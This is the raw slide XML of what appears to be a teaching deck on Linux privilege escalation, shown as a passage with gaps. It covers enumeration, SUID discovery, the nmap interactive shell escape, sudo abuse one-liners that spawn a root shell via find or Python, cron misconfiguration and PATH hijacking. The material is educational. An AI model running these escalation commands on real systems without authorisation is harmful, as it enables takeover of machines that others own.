              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76563496-9BB7-4B2F-AED4-4E198B71F6A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="34301" r="33168" b="35311"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1543843"/>
            <a:ext cx="8652445" cy="2213129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3057529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43435" y="95700"/>
            <a:ext cx="8875059"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Linux Privilege Escalation</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500" dirty="0"/>
              <a:t>In Linux systems, attackers use a process called “enumeration” to identify weaknesses that may allow privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Using Google searches, port scanning and direct interaction with a system to learn more about it and see how it responds to inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Seeing if compilers, or high-level programming languages like Perl or Python, are available, which can allow an attacker to run exploit code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Identifying software components, such as web servers and their versions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Retrieving data from key system directories such as /etc, /proc, ipconfig, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>lsof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>, netstat and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3821249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43435" y="95700"/>
            <a:ext cx="8875059"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Linux Privilege Escalation</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1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit services running as root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>, vulnerable version of MySQL could be exploited this way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> shows ports which are open and listening </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit vulnerable SUID executable to get root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -perm -u=s -type f 2&gt;/dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> shows executables with SUID bit set</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>The ‘s’ character instead of ‘x’ indicates that the SUID bit is set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Older version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> had an interactive shell and could be exploited by running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>and !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ABC4485-A302-4A00-A706-08ED5D3E4739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="778405" y="3781292"/>
            <a:ext cx="6771709" cy="419465"/>
            <a:chOff x="653044" y="2991617"/>
            <a:chExt cx="6771709" cy="419465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120552E9-1B46-4E08-BE75-0DA14D94DEC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="53950" t="87277" r="35217" b="11234"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="653044" y="3175338"/>
              <a:ext cx="5890089" cy="235744"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DCF0D02-54A1-41E8-B4E0-44E73D366EFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4"/>
            <a:srcRect l="50000" t="89969" r="35455" b="8567"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="653044" y="2991617"/>
              <a:ext cx="6771709" cy="183721"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182744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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux – Exploiting SUDO Rights</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004991"/>
            <a:ext cx="8520600" cy="34164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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting SUDO rights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> show commands which we can run as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> find /home -exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i \; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> find command’s exec parameter can be used for arbitrary code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> python -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty;pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("/bin/bash");’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>-&gt; opens root shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit badly configured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> jobs to get root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls -la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cron.d</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting users with ‘.’ in their PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PATH=.:${PATH}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>If PATH variable doesn’t have . , then you run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>, if it does, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>You will trick someone with root privilege to run the modified command e.g. making yourself admin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20317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LinPEAS</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ltLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>LinPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> is a script that search for possible paths to escalate privileges on Linux/Unix* hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
